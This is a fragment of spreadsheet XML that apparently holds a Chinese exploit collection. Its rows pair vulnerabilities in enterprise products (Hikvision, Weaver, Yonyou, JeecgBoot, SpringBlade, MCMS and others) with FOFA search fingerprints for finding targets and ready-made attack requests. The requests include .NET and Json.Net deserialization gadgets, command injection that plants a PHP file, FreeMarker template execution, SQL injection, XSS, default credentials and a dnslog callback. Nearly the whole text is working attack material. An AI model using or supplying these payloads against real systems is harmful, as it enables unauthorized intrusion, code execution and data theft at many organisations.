Y3RFbnVtZXJhYmxlSXRlcmF0b3J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VHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2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k+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2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JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmN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Qm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=&lt;/printOpByte&gt;&lt;printInfoByte&gt;&lt;/printInfoByte&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/SavePrintFormatAssign&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx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WOW64)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> AppleWebKit/537.36</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> (KHTML,like</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Gecko)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Chrome/61.0.1191.80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http://tempuri.org/GetChildFormAndEntityList</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
cmd:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ipconfig</t>
    </r>
  </si>
  <si>
    <t>亿赛通submitLogin 默认口令</t>
  </si>
  <si>
    <t>app="亿赛通-电子文档安全管理系统"</t>
  </si>
  <si>
    <t>POST /CDGServer3/druid/submitLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
loginUsername=druid&amp;loginPassword=EstNet.Druid</t>
  </si>
  <si>
    <t>瑞斯康达-多业务智能网关 list_base_config.php 远程命令执行</t>
  </si>
  <si>
    <t>body="/images/raisecom/back.gif" &amp;&amp; title=="Web user login"</t>
  </si>
  <si>
    <t>GET /vpn/list_base_config.php?type=mod&amp;parts=base_config&amp;template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
shell地址：/tmp/test.php</t>
  </si>
  <si>
    <t>Netgear WN604无线路由器siteSurvey.php 未授权访问</t>
  </si>
  <si>
    <t>title=="Netgear"</t>
  </si>
  <si>
    <t>http://ip/siteSurvey.php</t>
  </si>
  <si>
    <t>SpringBlade menu/list SQL 注入漏洞</t>
  </si>
  <si>
    <t>body="https://bladex.vip"</t>
  </si>
  <si>
    <t>GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1
Host: 
User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZS</t>
  </si>
  <si>
    <t>铭飞 MCMS 远程代码执行漏洞poc</t>
  </si>
  <si>
    <t>(body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js")</t>
  </si>
  <si>
    <t>POST /static/plugins/ueditor/1.4.3.3/jsp/editor.do?jsonConfig=%7b%76%69%64%65% 
6f%55%72%6c%50%72%65%66%69%78%3a%27%27%2c%66%69%6c%65%4d%61%6e%61%67%65%72%4c%69%73%74%50%61%74%68%3a%27%27%2c%6 
9%6d%61%67%65%4d%61%78%53%69%7a%65%3a%32%30%34%38%30%30 
%30%30%30%2c%76%69%64%65%6f%4d%61%78%53%69%7a%65%3a%32%3 
0%34%38%30%30%30%30%30%2c%66%69%6c%65%4d%61%78%53%69%7a% 
65%3a%32%30%34%38%30%30%30%30%30%2c%66%69%6c%65%55%72%6c 
%50%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%55%72%6c%5 
0%72%65%66%69%78%3a%27%27%2c%69%6d%61%67%65%50%61%74%68 
%46%6f%72%6d%61%74%3a%27%2f%7b%5c%75%30%30%32%45%5c%75%3 
0%30%32%45%5c%75%30%30%32%46%7d%7b%74%65%6d%70%6c%61%74 
%65%2f%31%2f%64%65%66%61%75%6c%74%2f%7d%7b%74%69%6d%65%7 
d%27%2c%66%69%6c%65%50%61%74%68%46%6f%72%6d%61%74%3a%27% 
2f%75%70%6c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6 
e%74%2f%65%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%76%6 
9%64%65%6f%50%61%74%68%46%6f%72%6d%61%74%3a%27%2f%75%70%6 
c%6f%61%64%2f%31%2f%63%6d%73%2f%63%6f%6e%74%65%6e%74%2f%65 
%64%69%74%6f%72%2f%7b%74%69%6d%65%7d%27%2c%22%69%6d%61%6 
7%65%41%6c%6c%6f%77%46%69%6c%65%73%22%3a%5b%22%2e%70%6e% 
67%22%2c%20%22%2e%6a%70%67%22%2c%20%22%2e%6a%70%65%67%22 
%2c%20%22%2e%6a%73%70%78%22%2c%20%22%2e%6a%73%70%22%2c%2 
2%2e%68%74%6d%22%5d%7d%0a&amp;action=uploadimage HTTP/1.1
Accept: */* 
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate 
Connection: close 
Content-Type: multipart/form-data; 
boundary=--------------------------583450229485407027180070 
Content-Length: 278 
----------------------------583450229485407027180070 
Content-Disposition: form-data; name="upload"; filename="1.htm" 
Content-Type: image/png 
&lt;#assign ex="freemarker.template.utility.Execute"?new()&gt; ${ ex("whoami") } 
----------------------------583450229485407027180070--
GET /mcms/search.do?tmpl=1721982083400.htm HTTP/1.1 
Accept: */* 
Host: 127.0.0.1:8080 
Accept-Encoding: gzip, deflate 
Connection: close</t>
  </si>
  <si>
    <t>任我行CRM存在反序列化漏洞</t>
  </si>
  <si>
    <t>app=“任我行-CRM”</t>
  </si>
  <si>
    <t>POST /SystemManage/UploadFile HTTP/1.1
Host: ip:port
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
photoInfo={{base64dec(ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgYWU1d3BiLmRuc2xvZy5jbiddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9)}}
ysoserial.exe -f Json.Net -g ObjectDataProvider -o base64 -c "ping gr00988k.dnslog.pw"</t>
  </si>
  <si>
    <t>海康威视综合安防管理平台前台远程命令执行</t>
  </si>
  <si>
    <t>POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http:///portal/cas/login/loginPage.do?service=http://x.x.x.x:80/portal
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=
Connection: close
Content-Length: 135
{"type":"environment","operate":"","machines":{"id":"$(id &gt; /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}</t>
  </si>
  <si>
    <t>泛微 E-cology getResourceInfo 存在认证绕过漏洞</t>
  </si>
  <si>
    <t>泛微e-office forwardsucess.php 存在SQL注入漏洞</t>
  </si>
  <si>
    <t>JeecgBoot积木报表组件权限绕过RCE</t>
  </si>
  <si>
    <t xml:space="preserve">title="Jeecg-Boot 快速开发平台" || body="积木报表"
</t>
  </si>
  <si>
    <t>1、漏洞描述
此接口为积木报表组件自带接口，该接口正常访问会提示没有权限，利用jmLink=YWFhfHxiYmI=可以绕过权限校验。在绕过权限校验后，可在请求体中注入内存马，以获取服务器权限。
2、漏洞路径
/jeecg-boot/jmreport/save?previousPage=xxx&amp;jmLink=YWFhfHxiYmI=</t>
  </si>
  <si>
    <t>泛微 HrmService SQL注入漏洞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /services/HrmServiceHTTP/1.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Upgrade-Insecure-Requests:1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/123.0.6312.88Safari/537.36</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Accept-Encoding:gzip,deflate,br</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Connection:close</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
SOAPAction:urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Type:text/xml;charset=UTF-8</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Host:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Length:427</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;soapenv:Envelopexmlns:soapenv="</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <color rgb="FF175CEB"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>http://schemas.xmlsoap.org/soap/envelope/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"xmlns:hrm="http://localhost/services/HrmService"&gt;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&lt;hrm:getHrmDepartmentInfo&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;!--type:string--&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;hrm:in0&gt;geroet&lt;/hrm:in0&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;!--type:string--&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;hrm:in1&gt;1)AND(db_name()like'ec%'&lt;/hrm:in1&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/hrm:getHrmDepartmentInfo&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soapenv:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soapenv:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /kp/PrintZP.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close</t>
  </si>
  <si>
    <t>泛微ecology系统setup接口存在信息泄露漏洞</t>
  </si>
  <si>
    <t>app="泛微-协同办公OA"</t>
  </si>
  <si>
    <t>GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 
Host: {{Hostname}} 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</t>
  </si>
  <si>
    <t>用友NC complainbilldetail SQL注入漏洞</t>
  </si>
  <si>
    <t>GET /ebvp/advorappcoll/complainbilldetail?pageId=login&amp;pk_complaint=1'waitfor+delay+'0:0:8'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive</t>
  </si>
  <si>
    <t>JeecgBoot反射型XSS漏洞</t>
  </si>
  <si>
    <t>title="Jeecg-Boot 快速开发平台"</t>
  </si>
  <si>
    <t>GET /userController.do?%3CsCrIpT%3Ealert(document.domain)%3C/sCrIpT%3E HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel MacOS X 10.15; rv:126.0) Gecko/20100101Firefox/126.0</t>
  </si>
  <si>
    <t>用友U9系统DoQuery接口存在SQL注入</t>
  </si>
  <si>
    <t>body="logo-u9.png"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /U9C/CS/Office/TransWebService.asmx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309</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http://tempuri.org/GetEnterprise</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&lt;GetEnterprise</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> xmlns="</t>
    </r>
    <r>
      <rPr>
